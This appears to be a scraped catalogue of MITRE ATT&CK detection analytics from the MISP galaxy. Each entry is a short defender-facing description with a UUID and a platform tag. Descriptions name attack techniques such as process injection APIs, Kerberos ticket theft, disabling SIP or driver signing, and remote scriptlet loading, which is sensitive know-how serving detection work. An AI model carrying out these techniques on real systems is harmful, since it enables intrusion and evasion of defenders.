Internal MISP references

UUID 458038e6-60a2-47d2-bd55-675e77f0e279 which can be used as unique global reference for Analytic 1636 - AN1636 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1636
mitre_platforms ['IaaS']

Analytic 1366 - AN1366

Chain of remote access tool behavior: (1) initial execution of remote-control/assist agent or GUI under user context; (2) persistence via service or autorun; (3) long-lived outbound connection/tunnel to external infrastructure; (4) interactive control signals such as shell or file-manager child processes spawned by the RAT parent.

Internal MISP references

UUID ba2056ee-77d7-49d4-a993-5806506964df which can be used as unique global reference for Analytic 1366 - AN1366 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1366
mitre_platforms ['Windows']

Analytic 1663 - AN1663

Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application. Many properly configured firewalls may naturally block one-way command and control traffic.

Internal MISP references

UUID ddebe043-2017-44ba-96e5-cbe87916511b which can be used as unique global reference for Analytic 1663 - AN1663 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1663
mitre_platforms ['Android']

Analytic 1637 - AN1637

Detects adversary abuse of SaaS platform vulnerabilities to bypass logging, monitoring, or consent boundaries. Defender perspective focuses on abnormal application integration events, missing audit logs, or API calls from unauthorized service principals that align with exploitation attempts.

Internal MISP references

UUID 77c3b78a-fb34-4040-9dda-057e8eca3362 which can be used as unique global reference for Analytic 1637 - AN1637 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1637
mitre_platforms ['SaaS']

Analytic 1367 - AN1367

Sequence of RAT agent execution, systemd persistence, and long-lived external egress; optional interactive shells spawned from the agent.

Internal MISP references

UUID d90a4f16-b5e1-4daa-bf65-91112fe02761 which can be used as unique global reference for Analytic 1367 - AN1367 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1367
mitre_platforms ['Linux']

Analytic 1376 - AN1376

Establishing network connections on uncommon ports or protocols following C2 disruption or blocking. Often executed by processes that typically exhibit no network activity.

Internal MISP references

UUID fcb2ed1a-2f39-47e8-9524-95ceac0ff383 which can be used as unique global reference for Analytic 1376 - AN1376 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1376
mitre_platforms ['Windows']

Analytic 1736 - AN1736

Application vetting services may detect when an application requests permissions after an application update. Application vetting services may look for indications that the application’s update includes malicious code at runtime. Application vetting services may be able to list domains and/or IP addresses that applications communicate with.

Internal MISP references

UUID 095c16b2-3d9a-445a-82a4-fa7affd928f5 which can be used as unique global reference for Analytic 1736 - AN1736 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1736
mitre_platforms ['iOS']

Analytic 1763 - AN1763

Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.

Internal MISP references

UUID 4b4a369c-35aa-4389-a218-2034fb043041 which can be used as unique global reference for Analytic 1763 - AN1763 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1763
mitre_platforms ['iOS']

Analytic 1673 - AN1673

Application vetting services could look for applications attempting to get android.os.SystemProperties or getprop with the runtime exec() commands. This could indicate some level of sandbox evasion, as Google recommends against using system properties within applications.

Internal MISP references

UUID 5044447d-dc82-4d74-ac8c-02e5559f374c which can be used as unique global reference for Analytic 1673 - AN1673 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1673
mitre_platforms ['Android']

Analytic 1386 - AN1386

Hidden files via 'chflags hidden' or Apple-specific attributes, LaunchAgents/LaunchDaemons placed in non-standard hidden directories. Defender view: detect command execution modifying file flags and unusual plist creation in hidden paths.

Internal MISP references

UUID 8963772e-2ee5-421e-aec0-b952d05d4efc which can be used as unique global reference for Analytic 1386 - AN1386 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1386
mitre_platforms ['macOS']

Analytic 1368 - AN1368

Electron/GUI or headless RAT execution followed by LaunchAgent/Daemon persistence and persistent external connections; interactive children (osascript/sh/curl) spawned by parent.

Internal MISP references

UUID 97f27df6-5041-437b-9aeb-58a9bc33a376 which can be used as unique global reference for Analytic 1368 - AN1368 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1368
mitre_platforms ['macOS']

Analytic 1638 - AN1638

SSH login from a remote system (via sshd), followed by user context execution of suspicious binaries or privilege escalation behavior.

Internal MISP references

UUID bcc6bec5-63c7-4084-9d2f-da8b58d0f621 which can be used as unique global reference for Analytic 1638 - AN1638 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1638
mitre_platforms ['Linux']

Analytic 1836 - AN1836

Mobile security products can use attestation to detect compromised devices.

Internal MISP references

UUID 0b0e244e-9386-4520-b030-9e330c6c1930 which can be used as unique global reference for Analytic 1836 - AN1836 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1836
mitre_platforms ['iOS']

Analytic 1683 - AN1683

Application vetting services could detect when applications store data insecurely, for example, in unprotected external storage.

Internal MISP references

UUID 7f84f2b8-6ef3-4167-b059-a455d7c40a7d which can be used as unique global reference for Analytic 1683 - AN1683 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1683
mitre_platforms ['Android']

Analytic 1396 - AN1396

Detection of obfuscated commands via shell, osascript, or AppleScript interpreters using unusual tokens, encoding, variable substitution, or runtime string reconstruction.

Internal MISP references

UUID 20157d55-1760-483c-a3b1-c6e219eeb75c which can be used as unique global reference for Analytic 1396 - AN1396 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1396
mitre_platforms ['macOS']

Analytic 1963 - AN1963

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 24e641ec-e64a-4f2c-91b1-8bd400e97547 which can be used as unique global reference for Analytic 1963 - AN1963 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1963
mitre_platforms ['PRE']

Analytic 1369 - AN1369

Detection of adversary behavior that disables or modifies security tools, including killing AV/EDR processes, stopping services, altering Sysmon registry keys, or tampering with exclusion lists. Defenders observe process/service termination, registry modification, and abnormal absence of expected telemetry.

Internal MISP references

UUID 7faf6f37-f074-4b9d-be19-618c3516486d which can be used as unique global reference for Analytic 1369 - AN1369 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1369
mitre_platforms ['Windows']

Analytic 1639 - AN1639

SSH login detected via Unified Logs, followed by unusual process execution, especially outside normal user behavior patterns.

Internal MISP references

UUID 9c8ba5cd-40db-4214-8db1-b03b2d7b1690 which can be used as unique global reference for Analytic 1639 - AN1639 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1639
mitre_platforms ['macOS']

Analytic 1693 - AN1693

When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice. (Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks) On Android, users may be presented with a popup to select the appropriate application to open the URI in. If the user sees an application they do not recognize, they can remove it.

Internal MISP references

UUID 5e90ac48-345b-445a-877f-596737ad7efb which can be used as unique global reference for Analytic 1693 - AN1693 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1693
mitre_platforms ['Android']

Analytic 1377 - AN1377

Creation of outbound connections on alternate ports or using covert transport (e.g., ICMP, DNS) from non-network-intensive processes, following known disruption or blocked traffic.

Internal MISP references

UUID a50c90f1-51b1-4948-8945-4b89735d4750 which can be used as unique global reference for Analytic 1377 - AN1377 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1377
mitre_platforms ['Linux']

Analytic 1737 - AN1737

The user can review which applications have location and sensitive phone information permissions in the operating system’s settings menu. Application vetting services can detect unnecessary and potentially abused API calls. Application vetting services can detect unnecessary and potentially abused permissions.

Internal MISP references

UUID 31d95dc7-aec7-47a2-bbb4-8b20ca3bc184 which can be used as unique global reference for Analytic 1737 - AN1737 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1737
mitre_platforms ['Android']

Analytic 1773 - AN1773

In iOS 14 and up, an orange dot (or orange square if the Differentiate Without Color setting is enabled) appears in the status bar when the microphone is being used by an application. However, there have been demonstrations indicating it may still be possible to access the microphone in the background without triggering this visual indicator by abusing features that natively access the microphone or camera but do not trigger the visual indicators.(Citation: iOS Mic Spyware)

In Android 12 and up, a green dot appears in the status bar when the microphone is being used by an application.(Citation: Android Privacy Indicators) Android applications using the RECORD_AUDIO permission and iOS applications using RequestRecordPermission should be carefully reviewed and monitored. If the CAPTURE_AUDIO_OUTPUT permission is found in a third-party Android application, the application should be heavily scrutinized.

In both Android (6.0 and up) and iOS, the user can review which applications have the permission to access the microphone through the device settings screen and revoke permissions as necessary.

Internal MISP references

UUID 4623e949-e902-4a8c-893b-73e5ab4b57d5 which can be used as unique global reference for Analytic 1773 - AN1773 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1773
mitre_platforms ['iOS']

Analytic 1378 - AN1378

Outbound fallback traffic from low-profile or background launch agents using unusual protocols or destinations after primary channel inactivity.

Internal MISP references

UUID 3e682b33-5064-4202-aad7-ca1900fde1a5 which can be used as unique global reference for Analytic 1378 - AN1378 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1378
mitre_platforms ['macOS']

Analytic 1387 - AN1387

Abuse of VMFS or ESXi shell to hide datastore files, renaming/moving VMDK or VMX files into hidden directories. Defender view: anomalous ESXi shell commands or file operations obscuring VM artifacts.

Internal MISP references

UUID a3c087a6-b7dc-464f-9e84-278bf3076ed1 which can be used as unique global reference for Analytic 1387 - AN1387 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1387
mitre_platforms ['ESXi']

Analytic 1738 - AN1738

The user can review which applications have location and sensitive phone information permissions in the operating system’s settings menu. Application vetting services can detect unnecessary and potentially abused API calls. Application vetting services can detect unnecessary and potentially abused permissions.

Internal MISP references

UUID 28304317-cbde-45cd-bf0b-99b5cd8d1478 which can be used as unique global reference for Analytic 1738 - AN1738 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1738
mitre_platforms ['iOS']

Analytic 1783 - AN1783

Application vetting services could look for android.permission.READ_CONTACTS in an Android application’s manifest, or NSContactsUsageDescription in an iOS application’s Info.plist file. Most applications do not need contact list access, so extra scrutiny could be applied to those that request it. On both Android and iOS, the user can manage which applications have permission to access the contact list through the device settings screen, revoking the permission if necessary.

Internal MISP references

UUID 6f77061e-d663-487d-bfca-cd1e1f1d24d7 which can be used as unique global reference for Analytic 1783 - AN1783 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1783
mitre_platforms ['iOS']

Analytic 1837 - AN1837

Application vetting services can detect which broadcast intents an application registers for and which permissions it requests.

Internal MISP references

UUID fbc0a210-8942-4fcb-81f1-a120551013d4 which can be used as unique global reference for Analytic 1837 - AN1837 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1837
mitre_platforms ['Android']

Analytic 1937 - AN1937

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 3b25198c-e31d-4e0c-9d26-eb8e714c71a8 which can be used as unique global reference for Analytic 1937 - AN1937 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1937
mitre_platforms ['PRE']

Analytic 1379 - AN1379

Outbound traffic from host management services or guest-to-host interactions over unusual interfaces (e.g., backdoor API endpoints or external VPN tunnels).

Internal MISP references

UUID 5e7eea18-14f5-4d76-b5cc-bc63a0e5ce65 which can be used as unique global reference for Analytic 1379 - AN1379 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1379
mitre_platforms ['ESXi']

Analytic 1973 - AN1973

Monitor for suspicious network traffic that could be indicative of probing for user information, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.

Internal MISP references

UUID dc58724a-18a9-4bb9-a901-f5630963095b which can be used as unique global reference for Analytic 1973 - AN1973 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1973
mitre_platforms ['PRE']

Analytic 1397 - AN1397

Detection of mshta.exe execution where command-line arguments reference remote or local HTA/script content (VBScript/JScript) followed by subsequent file creation, network retrieval, or process spawning that indicates payload execution outside standard Internet Explorer security context. Correlation includes parent process lineage, command-line inspection, and network connection creation to untrusted or anomalous endpoints.

Internal MISP references

UUID e6037bea-ba25-40bf-b681-361d4f901adb which can be used as unique global reference for Analytic 1397 - AN1397 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1397
mitre_platforms ['Windows']

Analytic 1793 - AN1793

Abuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. Enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID d11da2b2-1552-4a54-b268-3df1cb877cf6 which can be used as unique global reference for Analytic 1793 - AN1793 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1793
mitre_platforms ['Android']

Analytic 1739 - AN1739

On Android, Verified Boot can detect unauthorized modifications to the system partition.(Citation: Android-VerifiedBoot) Android's SafetyNet API provides remote attestation capabilities, which could potentially be used to identify and respond to compromise devices. Samsung Knox provides a similar remote attestation capability on supported Samsung devices.

Internal MISP references

UUID e8bfbaf2-cfa8-41fd-a5ee-48b57026ac7c which can be used as unique global reference for Analytic 1739 - AN1739 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1739
mitre_platforms ['Android']

Analytic 1388 - AN1388

Malicious macros or embedded objects hidden within Office documents by renaming streams or using hidden OLE objects. Defender view: detection of hidden macro streams or objects in documents correlated with anomalous execution.

Internal MISP references

UUID a6299804-cf50-4496-a242-1394ff89c147 which can be used as unique global reference for Analytic 1388 - AN1388 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1388
mitre_platforms ['Office Suite']

Analytic 1838 - AN1838

Application vetting services could detect applications trying to modify files in protected parts of the operating system. Verified Boot can detect unauthorized modifications to the system partition.(Citation: Android-VerifiedBoot) Android’s SafetyNet API provides remote attestation capabilities, which could potentially be used to identify and respond to compromised devices. Samsung Knox provides a similar remote attestation capability on supported Samsung devices.

Internal MISP references

UUID fdb6acce-e069-4e35-8a4b-f4517924f092 which can be used as unique global reference for Analytic 1838 - AN1838 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1838
mitre_platforms ['Android']

Analytic 1389 - AN1389

Detects the execution of non-browser processes establishing outbound encrypted network connections using uncommon symmetric encryption protocols (e.g., AES via PowerShell or custom scripts) to alternate external destinations.

Internal MISP references

UUID 4e5ffb58-75de-4305-a439-98ca3499f45e which can be used as unique global reference for Analytic 1389 - AN1389 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1389
mitre_platforms ['Windows']

Analytic 1983 - AN1983

Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)). Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: Spearphishing via Service).

Internal MISP references

UUID 9301fed2-1abe-4250-85b0-7794431e9034 which can be used as unique global reference for Analytic 1983 - AN1983 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1983
mitre_platforms ['PRE']

Analytic 1398 - AN1398

Adversary gains high integrity or special privileges (e.g., SeDebugPrivilege), locates a running browser process, opens it with write/inject rights, and modifies it (e.g., CreateRemoteThread / DLL load) to inherit cookies/tokens or establish a browser pivot. Optional step: create a new logon session or use explicit credentials, then drive the victim browser to intranet resources.

Internal MISP references

UUID c3629243-7cd6-4e56-9275-73f5752f0f08 which can be used as unique global reference for Analytic 1398 - AN1398 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1398
mitre_platforms ['Windows']

Analytic 1938 - AN1938

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID cf5aa9ca-0f1b-4707-94af-484228fd6199 which can be used as unique global reference for Analytic 1938 - AN1938 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1938
mitre_platforms ['PRE']

Analytic 1839 - AN1839

Application vetting services could detect applications trying to modify files in protected parts of the operating system. Verified Boot can detect unauthorized modifications to the system partition.(Citation: Android-VerifiedBoot) Android’s SafetyNet API provides remote attestation capabilities, which could potentially be used to identify and respond to compromised devices. Samsung Knox provides a similar remote attestation capability on supported Samsung devices.

Internal MISP references

UUID 98b0a8a6-881d-4f00-84c3-3f70d368067e which can be used as unique global reference for Analytic 1839 - AN1839 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1839
mitre_platforms ['iOS']

Analytic 1399 - AN1399

Detects process injection by correlating memory manipulation API calls (e.g., VirtualAllocEx, WriteProcessMemory), suspicious thread creation (e.g., CreateRemoteThread), and unusual DLL loads within another process's context.

Internal MISP references

UUID 337976cc-5fd5-49e8-abcb-79f27d19382c which can be used as unique global reference for Analytic 1399 - AN1399 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1399
mitre_platforms ['Windows']

Analytic 1939 - AN1939

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID a9a66c41-1b05-41fc-a866-272848b051ff which can be used as unique global reference for Analytic 1939 - AN1939 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1939
mitre_platforms ['PRE']

Analytic 1993 - AN1993

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: Phishing).

Internal MISP references

UUID ab74118c-05e1-4acd-b1c2-445d1f7c5fd1 which can be used as unique global reference for Analytic 1993 - AN1993 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1993
mitre_platforms ['PRE']

Analytic 1444 - AN1444

Detects suspicious access to SSSD secrets database and Kerberos key material indicating ticket theft or replay attempts. Correlates anomalous file access with unusual Kerberos service ticket requests.

Internal MISP references

UUID c101374a-ce7a-46d7-b7d4-c64fbdf1f685 which can be used as unique global reference for Analytic 1444 - AN1444 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1444
mitre_platforms ['Linux']

Analytic 1544 - AN1544

Detection of valid account misuse through SSH logins, sudo/su abuse, and service account anomalies outside expected patterns.

Internal MISP references

UUID 6cf46787-028d-4ac8-9dfa-58682edb3625 which can be used as unique global reference for Analytic 1544 - AN1544 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1544
mitre_platforms ['Linux']

Analytic 1454 - AN1454

Execution of system info utilities like systemsetup, sw_vers, uname, or sysctl by terminal or scripted processes.

Internal MISP references

UUID 85a20f4b-4171-4450-a34f-17725d44aad9 which can be used as unique global reference for Analytic 1454 - AN1454 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1454
mitre_platforms ['macOS']

Analytic 1445 - AN1445

Detects attempts to forge or replay Kerberos tickets by monitoring Unified Logs for anomalous kinit/klist activity and correlating unusual authentication sequences.

Internal MISP references

UUID c08ad617-cc0d-4435-9168-08c762048503 which can be used as unique global reference for Analytic 1445 - AN1445 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1445
mitre_platforms ['macOS']

Analytic 1446 - AN1446

Monitors execution of administrative utilities (e.g., bcdedit.exe) or registry modifications that disable Driver Signature Enforcement (DSE) or enable Test Signing. Correlates command-line activity, registry changes, and subsequent process executions that bypass signing enforcement.

Internal MISP references

UUID 83067587-4426-44cb-89de-f2b948c91104 which can be used as unique global reference for Analytic 1446 - AN1446 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1446
mitre_platforms ['Windows']

Analytic 1464 - AN1464

Execution of PubPrn.vbs via cscript.exe using the 'script:' moniker to load and execute a remote .sct scriptlet file, bypassing signature validation and proxying remote payloads through a signed Microsoft script host.

Internal MISP references

UUID e7444be7-3c0a-4ff2-927d-f623af05936d which can be used as unique global reference for Analytic 1464 - AN1464 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1464
mitre_platforms ['Windows']

Analytic 1644 - AN1644

Application vetting services may detect API calls to performGlobalAction(int). The user can view a list of device administrators and applications that have registered accessibility services in device settings. The user can typically visually see when an action happens that they did not initiate and can subsequently review installed applications for any out of place or unknown ones. Applications that register an accessibility service or request device administrator permissions should be scrutinized further for malicious behavior.

Internal MISP references

UUID 23a1b062-847e-4912-8e5e-5b69867af4a4 which can be used as unique global reference for Analytic 1644 - AN1644 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1644
mitre_platforms ['Android']

Analytic 1447 - AN1447

Detects modification of System Integrity Protection (SIP) or code signing enforcement policies through csrutil or kernel variable tampering. Correlates execution of csrutil disable commands with subsequent policy state changes and anomalous unsigned process executions.

Internal MISP references

UUID 7853421f-8eb4-49c3-9943-077430b97037 which can be used as unique global reference for Analytic 1447 - AN1447 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1447
mitre_platforms ['macOS']

Analytic 1474 - AN1474

Unauthorized modification of TCC.db followed by elevated process execution under a trusted parent (e.g., Finder, SystemUIServer) or via launchctl environment override. Also includes identification of SIP being disabled, which is highly uncommon and a prerequisite for this abuse path.

Internal MISP references

UUID c0766f2c-e282-44a1-8dcf-1575d77658da which can be used as unique global reference for Analytic 1474 - AN1474 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1474
mitre_platforms ['macOS']

Analytic 1744 - AN1744

When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice.(Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks) On Android, users may be presented with a popup to select the appropriate application to open a URI in. If the user sees an application they do not recognize, they can remove it.

Internal MISP references

UUID 8a463850-89e6-4de8-bd8d-20fd70dff959 which can be used as unique global reference for Analytic 1744 - AN1744 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1744
mitre_platforms ['iOS']

Analytic 1448 - AN1448

A remote host sends a short sequence of failed connection attempts (RST/ICMP unreachable) to a set of closed ports. Within a brief window the endpoint (a) adds/enables a firewall rule or (b) a sniffer-backed process begins listening or opens a new socket, after which a successful connection occurs. Also detects Wake-on-LAN magic packets seen on local segment.

Internal MISP references

UUID 0848a778-7bcf-48d9-a14a-d29d1e71e656 which can be used as unique global reference for Analytic 1448 - AN1448 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1448
mitre_platforms ['Windows']

Analytic 1484 - AN1484

sshd, socat, or custom binaries initiating port forwarding or encapsulating traffic (e.g., RDP, SMB) through SSH or HTTP. Defender sees abnormal connect/bind syscalls, encrypted traffic on ports typically used for non-encrypted services, and outlier traffic volume patterns.

Internal MISP references

UUID 5acd81f3-466a-472d-bb1f-9bda231ac4c0 which can be used as unique global reference for Analytic 1484 - AN1484 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1484
mitre_platforms ['Linux']

Analytic 1844 - AN1844

Unexpected behavior from an application could be an indicator of masquerading. Application vetting services may potentially determine if an application contains suspicious code and/or metadata.

Internal MISP references

UUID ff9c219a-b8e7-4b0a-8ea5-4f81341375d1 which can be used as unique global reference for Analytic 1844 - AN1844 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1844
mitre_platforms ['iOS']

Analytic 1944 - AN1944

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 240a8cec-0e3a-44ed-a485-4d212a21b127 which can be used as unique global reference for Analytic 1944 - AN1944 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1944
mitre_platforms ['PRE']

Analytic 1449 - AN1449

Closed-port knock sequence from a remote IP followed by on-host firewall change (iptables/nftables) or daemon starts listening (socket open) and a successful TCP/UDP connect. Optional detection of libpcap/raw-socket sniffers spawning to watch for secret values.

Internal MISP references

UUID 2e7a9609-3e4b-477b-828f-f486561d7fa7 which can be used as unique global reference for Analytic 1449 - AN1449 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1449
mitre_platforms ['Linux']

Analytic 1494 - AN1494

Detects adversary behavior where a process enumerates and modifies another process's memory using /proc/[pid]/maps and /proc/[pid]/mem files. This includes identifying gadgets via memory mappings and overwriting process memory via low-level file modification or dd usage.

Internal MISP references

UUID 3a57e109-235d-497a-9c90-952ab8b749b6 which can be used as unique global reference for Analytic 1494 - AN1494 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1494
mitre_platforms ['Linux']

Analytic 1455 - AN1455

Execution of esxcli system hostname get, esxcli system version get, or esxcli hardware commands through SSH or local shell.

Internal MISP references

UUID 164a04c5-db61-477f-b3fa-8bf806631fbb which can be used as unique global reference for Analytic 1455 - AN1455 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1455
mitre_platforms ['ESXi']

Analytic 1554 - AN1554

ESXi hypervisor environmental validation behavioral chain: (1) Virtual machine inventory and configuration enumeration through vim-cmd and esxcli commands, (2) Host hardware and network configuration discovery for hypervisor environment validation, (3) Datastore and storage configuration reconnaissance, (4) vCenter connectivity and cluster membership validation, (5) Selective malware deployment based on virtualization infrastructure characteristics and target VM validation

Internal MISP references

UUID 1cd8c844-575a-44be-9fee-80cd988dc781 which can be used as unique global reference for Analytic 1554 - AN1554 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1554
mitre_platforms ['ESXi']

Analytic 1545 - AN1545

Detection of interactive and remote logins by service accounts or users at unusual times, with unexpected child process activity.

Internal MISP references

UUID d059a437-bf45-4b10-a36c-7e42e183d3c7 which can be used as unique global reference for Analytic 1545 - AN1545 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1545
mitre_platforms ['macOS']

Analytic 1465 - AN1465

Unusual or suspicious processes loading critical native API DLLs (e.g., ntdll.dll, kernel32.dll) followed by direct syscall behavior, memory manipulation, or hollowing.

Internal MISP references

UUID 2a23296d-70f2-4e04-9a97-62d093ad1765 which can be used as unique global reference for Analytic 1465 - AN1465 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1465
mitre_platforms ['Windows']

Analytic 1546 - AN1546

Detection of valid account abuse in IdP logs via geographic anomalies, impossible travel, risky sign-ins, and multiple MFA attempts or failures.

Internal MISP references

UUID aa255cdc-0b49-4ad3-951d-eab5582da56f which can be used as unique global reference for Analytic 1546 - AN1546 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1546
mitre_platforms ['Identity Provider']

Analytic 1456 - AN1456

Use of cloud API calls (e.g., AWS EC2 DescribeInstances, Azure VM Inventory) to enumerate system configurations across assets.

Internal MISP references

UUID d664b158-5035-4e0b-a069-7a5b27ce0936 which can be used as unique global reference for Analytic 1456 - AN1456 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1456
mitre_platforms ['IaaS']

Analytic 1564 - AN1564

Detection of Office or document viewer processes (e.g., winword.exe) initiating network connections to remote templates or executing scripts due to manipulated template references (e.g., embedded in .docx, .rtf, or .dotm files), followed by suspicious child process creation (e.g., PowerShell).

Internal MISP references

UUID dea5f6cc-d3bb-404b-8aab-f7366988a96e which can be used as unique global reference for Analytic 1564 - AN1564 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1564
mitre_platforms ['Windows']

Analytic 1654 - AN1654

Integrity checking mechanisms can potentially detect unauthorized hardware modifications.

Internal MISP references

